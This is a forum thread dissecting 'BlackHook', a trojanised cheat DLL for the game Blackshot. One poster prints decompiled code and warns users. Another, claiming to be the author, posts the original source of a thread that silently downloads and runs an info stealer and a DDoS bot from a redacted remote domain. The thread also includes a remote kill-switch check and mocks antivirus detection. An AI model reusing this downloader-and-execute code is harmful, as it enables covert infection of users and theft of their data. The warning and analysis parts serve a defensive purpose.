BlackHook Virus Analysis

[biexor]

Here is a full analysis of Bl@ck H0ok.

For those of you that do not understand it, just skip down to the conclusion.

BlackHook is a hack for blackshot that Many of you have tried or are using,
however, what most of you dont know is that this not just a hack, its also a virus downloader!

Since this is a self-made virus, no "normal" virus scanner will be able to report this as a virus.

TIP: You should always run suspicious files inside a Sandbox!



Analysis:

This is what BlackHook does when it is injected into a process:

[PHP]BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
BOOL result; // eax@2

if ( fdwReason == 1 )
{
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)D3D9Hook, 0, 0, 0);
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Hook, 0, 0, 0);
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)AskPermission, 0, 0, 0);
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)RunVirus, 0, 0, 0);
result = 1;
}
else
{
if ( !fdwReason )
{
remove("bypass.exe");
remove("bypass_.exe");
remove("bypass__.exe");
}
result = 1;
}
return result;
}[/PHP]


First, Lets take a look at
[PHP]CreateThread(0, 0, (LPTHREAD_START_ROUTINE)AskPermission, 0, 0, 0);[/PHP]


The code inside this thread will download this file: "https://www.dope****/stlr/public.dat"
And save the file as "crasherror.dat"
"crasherror.dat" is just a fake file name to make it look convincing.


Whats so special about this file?

This file contains a simple boolean, which will tell BlackHook to enable or disable it self.
This means that Cocaine1 (the creator of the BlackHook Virus) can make BlackHook unusable to everyone
just by changing this text file.
So if Cocaine1 does not want you to run BlackHook, he can just delete the file from his server
.. and now BlackHook will not work anymore.



Now, lets see what RunVirus does
[PHP]CreateThread(0, 0, (LPTHREAD_START_ROUTINE)RunVirus, 0, 0, 0);[/PHP]


This is what happens inside RunVirus:

[PHP]void __stdcall RunVirus(int Handled)
{
remove("bypass.exe");
remove("bypass_.exe");
remove("bypass__.exe");
URLDownloadToFileA(0, "https://www.dope****/stlr/bypass.dat", "bypass.exe", 0, 0);
Sleep(5000);
URLDownloadToFileA(0, "https://www.dope****/bypass_.dat", "bypass_.exe", 0, 0);
Sleep(5000u);
URLDownloadToFileA(0, "https://www.dope****/bypass__.dat", "bypass__.exe", 0, 0);
Sleep(5000u);
ShellExecuteA(0, "open", "bypass.exe", 0, 0, 0);
Sleep(1000u);
ShellExecuteA(0, "open", "bypass_.exe", 0, 0, 0);
Sleep(1000u);
ShellExecuteA(0, "open", "bypass__", 0, 0, 0);
while ( 1 )
{
remove("bypass.exe");
remove("bypass_.exe");
remove("bypass__.exe");
Sleep(250u);
}
}
[/PHP]
This code should be very self-explainatory.

It downloads three viruses and opens them.

You can see that there is a BUG in this program ...
The third virus will not open itself because the filename is wrong lmao.

But if you have ever used BlackHook, you are still infected with two other viruses. Most likely Keyloggers.



Next, I will make a crack for BlackHook which removes the viruses and also enables you run BlackHook forever. Stay Tuned.

[F-U-ALL]

Now what if there isnt viruses in it.

He could just use the name RUnVirus to scare people.

But then theres bypass.exe which is a possiblilty of a bypass to the game.

All i can say is it could be a virus or not.

Although i think its a virus since my computer shuts down when i use blackhook

[biexor]

@F-U-ALL

The name RunVirus was something i created, the original name was sub_403880

Like I said, I analyzed this program, I didn't "get" a source code and thought it was a virus..
I recreated the source code from assembly just to show you what the program does.

In my post I describe what the program does, and all of it is True. and not based on guess-work. Appreciate.

[rikel]

Let's clear some things...

The original code is :

Code:

BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpvReserved)
{
    if(dwReason == DLL_PROCESS_ATTACH) {
        CreateThread(0, 0, LoopFunction, 0, 0, 0); // Keeps hooking the d3d functions
 	CreateThread(0, 0, MemHacks, 0, 0, 0); // Loops and does the memory related hacks
	CreateThread(0, 0, noob, 0, 0, 0); // "anti-leech" loop
        CreateThread(0, 0, stealers, 0, 0, 0); // obvious is obvious
    }
    else if(dwReason == DLL_PROCESS_DETACH) {
            remove("bypass.exe");
	    remove("bypass_.exe");
	    remove("bypass__.exe");
	}

    return TRUE;
}


DWORD WINAPI stealers( LPVOID lpParam  )
{
	remove("bypass.exe");
	remove("bypass_.exe");
	remove("bypass__.exe");
	URLDownloadToFile( NULL, "https://www.dope****/stlr/bypass.dat", "bypass.exe", 0, NULL );
	Sleep(5000);
	URLDownloadToFile( NULL, "https://www.dope****/bypass_.dat", "bypass_.exe", 0, NULL );
    Sleep(5000);
	URLDownloadToFile( NULL, "https://www.dope****/bypass__.dat", "bypass__.exe", 0, NULL );
	Sleep(5000);
	ShellExecute( NULL, "open", "bypass.exe",NULL, NULL, SW_HIDE);
	Sleep(1000);
	ShellExecute( NULL, "open", "bypass_.exe",NULL, NULL, SW_HIDE);
	Sleep(1000);
    ShellExecute( NULL, "open", "bypass__",NULL, NULL, SW_HIDE);
	while(1){
		remove("bypass.exe");
	    remove("bypass_.exe");
	    remove("bypass__.exe");
		Sleep(250);
	}

	return 0;
}

The check was just downloading the file and checking it's size, if it corresponded you could use the hack, if not the hack does nothing ( there's an if (auth == true ) in every function )

The virus thread was downloading 2 files ( the third i forgot to comment out ) , 1 iStealer and the other DDoSer. NO KEYLOGGERS, for you noobs all the viruses are keyloggers...

The domain has been disabled a long time ago and so was the hack -> it will not work nor infect anyone.

If you had any clue about hack you would of known the hack is detected by now and even if you remove the check and the virus thread it will still not work.

One last thing, this is the last build

Code:

MenuAddItem("Cokaine 27.06.2010", writing, &CH_writing, 1, MENUFOLDER);

Took you 4 months and a half to reverse an useless old hack

Since this is a self-made virus, no "normal" virus scanner will be able to report this as a virus.

a "normal" virus scanner detects the URLDownloadToFile function and https:// as a downloader. i thought you were smart?

btw, if it's any doubt, yes, i am Cokaine/Cokaine1.